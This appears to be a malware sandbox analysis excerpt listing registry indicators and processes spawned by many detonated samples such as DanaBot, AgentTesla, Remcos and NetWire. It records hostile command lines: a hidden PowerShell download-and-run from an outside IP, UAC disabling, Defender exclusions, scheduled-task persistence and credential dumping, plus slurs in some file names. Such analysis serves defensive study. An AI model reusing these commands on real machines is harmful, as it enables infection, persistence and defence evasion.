| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe | N/A |
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
"C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgBxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAYgByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABpAGQAIAB5AG8AdQAgAGsAbgBvAHcAIAB5AG8AdQAnACcAcgBlACAAZgB1AGMAawBlAGQAIAB3AGkAdABoACAAYQAgAHMAaABpAHQAIAB0AG8AbgAgAG8AZgAgAFIAQQBUACAAZgBhAG0AaQBsAGkAZQBzAD8AIABPAGgAIAB3AGUAbABsACwAIABlAG4AagBvAHkAIAB0AGgAZQAgAG0AYQB5AGgAZQBtACEAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHUAdQBxACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15746454561168637836-1879871828-1934318429-63483566020160194057204518101127178097"
C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe
"C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe"
C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
"C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe
"C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe"
C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
"C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
"C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe"
C:\Users\Admin\AppData\Local\Temp\proxyt.exe
"C:\Users\Admin\AppData\Local\Temp\proxyt.exe"
C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
"C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe"
C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
"C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
C:\Users\Admin\AppData\Local\Temp\DanaBot.exe
"C:\Users\Admin\AppData\Local\Temp\DanaBot.exe"
C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe
"C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe"
C:\Users\Admin\AppData\Local\Temp\2020.exe
"C:\Users\Admin\AppData\Local\Temp\2020.exe"
C:\Users\Admin\AppData\Local\Temp\2020.exe
"C:\Users\Admin\AppData\Local\Temp\2020.exe"
C:\Users\Admin\AppData\Local\Temp\2020.exe
"C:\Users\Admin\AppData\Local\Temp\2020.exe"
C:\Users\Admin\AppData\Local\Temp\2020.exe
"C:\Users\Admin\AppData\Local\Temp\2020.exe"
C:\Users\Admin\AppData\Local\Temp\2020.exe
"C:\Users\Admin\AppData\Local\Temp\2020.exe"
C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
"C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe
"C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe"
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
"C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe"
C:\Users\Admin\AppData\Local\Temp\goofy.exe
"C:\Users\Admin\AppData\Local\Temp\goofy.exe"
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe C:\Users\Admin 0
C:\Users\Admin\AppData\Local\Temp\FutureClient.exe
"C:\Users\Admin\AppData\Local\Temp\FutureClient.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\nigga.exe
"C:\Users\Admin\AppData\Local\Temp\nigga.exe"
C:\Users\Admin\AppData\Local\Temp\amadey.exe
"C:\Users\Admin\AppData\Local\Temp\amadey.exe"
C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe
"C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe"
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Local\Temp\DanaBot.dll f1 C:\Users\Admin\AppData\Local\Temp\DanaBot.exe@1964
C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
"C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe
"C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe"
C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
"C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 556
C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe
"C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe"
C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
"C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "181565198770428621091867651924704072674597771918110201-1801149945431554144"
C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
"C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe
"C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe"
C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
"C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\DanaBot.dll,f0
C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe
"C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe"
C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
"C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
C:\ProgramData\a5410c88f1\bween.exe
"C:\ProgramData\a5410c88f1\bween.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-377776966698010413-1541660903-1905702121-199210903414701797671690944494-1824815470"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr
"C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr" /S
C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
"C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
C:\Users\Admin\AppData\Roaming\Installer.exe
"C:\Users\Admin\AppData\Roaming\Installer.exe"
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\SysWOW64\sysadgi.exe
C:\Windows\SysWOW64\sysadgi.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
C:\Users\Admin\AppData\Local\Temp\malware.exe
"C:\Users\Admin\AppData\Local\Temp\malware.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 56
C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe
"C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
C:\ProgramData\Hdlharas\dlrarhsiva.exe
"C:\ProgramData\Hdlharas\dlrarhsiva.exe"
C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe
"C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe"
C:\Users\Admin\AppData\Local\Temp\NetWire.exe
"C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe
"C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe"
C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe
"C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe"
C:\Users\Admin\AppData\Local\Temp\Remcos.exe
"C:\Users\Admin\AppData\Local\Temp\Remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\NetWire.exe
"C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
C:\Users\Admin\AppData\Local\Temp\setup-26030245461.exe
C:\Users\Admin\AppData\Local\Temp\\setup-26030245461.exe
C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe
"C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe"
C:\Users\Admin\AppData\Local\Temp\putty.exe
"C:\Users\Admin\AppData\Local\Temp\putty.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe
"C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn SFcJ5mayRHd /tr "mshta C:\Users\Admin\AppData\Local\Temp\vIUZK9jrL.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\vIUZK9jrL.hta
C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe
"C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe"
C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe
"C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe"
C:\Windows\SysWOW64\PING.EXE
PING 127.0.0.1 -n 2
C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
"C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn SFcJ5mayRHd /tr "mshta C:\Users\Admin\AppData\Local\Temp\vIUZK9jrL.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GTJXQ4EPBLH8ZMURUIOKYKKWAZ53TFAY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\server.exe
"C:\Users\Admin\AppData\Local\server.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SysWOW64\Userdata\Userdata.exe
"C:\Windows\SysWOW64\Userdata\Userdata.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\2DB5.tmp\putty.bat" "C:\Users\Admin\AppData\Local\Temp\putty.exe""
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1116
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
"C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe" /S
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\5bL3uM03lwMc.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\proxyt.exe > nul
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GWXUD.bat" "
C:\Users\Admin\AppData\Local\TempGTJXQ4EPBLH8ZMURUIOKYKKWAZ53TFAY.EXE
"C:\Users\Admin\AppData\Local\TempGTJXQ4EPBLH8ZMURUIOKYKKWAZ53TFAY.EXE"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "skypee" /t REG_SZ /d "C:\Windows\Skypee\skypee.exe" /f
C:\Windows\Skypee\skypee.exe
"C:\Windows\Skypee\skypee.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe
"C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe"
C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe
"C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe"
C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe
"C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 504
C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Users\Admin\AppData\Local\Temp\a\Adobe_PhotoshopSetups.exe
"C:\Users\Admin\AppData\Local\Temp\a\Adobe_PhotoshopSetups.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'Minecraft"' /tr "'C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
C:\Users\Admin\AppData\Local\Temp\a\setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\a\system.exe
"C:\Users\Admin\AppData\Local\Temp\a\system.exe"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe' $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'dJ3H492fymd.exe-942' -RunLevel Highest "
C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5A12.tmp.bat""
C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
"C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe
"C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"'
C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe
"C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\taskhostw.exe'
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1697420900235384164176743894 -oextracted
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe'
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\loader.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\system.exe'
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\attrib.exe
attrib +H "svchosts64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe'
C:\Users\Admin\AppData\Roaming\Minecraft.exe
"C:\Users\Admin\AppData\Roaming\Minecraft.exe"
C:\Users\Admin\AppData\Local\Temp\a\01.exe
"C:\Users\Admin\AppData\Local\Temp\a\01.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\AppData\Local\Temp\main\svchosts64.exe
"svchosts64.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qt0k0Sdu7IVY.bat" "
C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
"C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PhotoshopSetup.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
"C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\Skypee\skypee.exe
"C:\Windows\Skypee\skypee.exe"
C:\Windows\Skypee\skypee.exe
"C:\Windows\Skypee\skypee.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Windows\syswow64\svchost.exe
C:\Windows\syswow64\svchost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RtkAudUService64.exe'
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\a\ori.exe
"C:\Users\Admin\AppData\Local\Temp\a\ori.exe"
C:\Users\Admin\AppData\Local\Temp\10337530101\6f415ff773.exe
"C:\Users\Admin\AppData\Local\Temp\10337530101\6f415ff773.exe"
C:\Users\Admin\AppData\Local\Temp\a\we.exe
"C:\Users\Admin\AppData\Local\Temp\a\we.exe"
C:\Users\Admin\AppData\Local\Temp\a\rem.exe
"C:\Users\Admin\AppData\Local\Temp\a\rem.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 704
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
"C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHostsss'
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 86E9DEBBF3F86EAD18A73832C0FAD017 C
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAD4F.tmp.bat""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10337540121\am_no.cmd" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate'
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
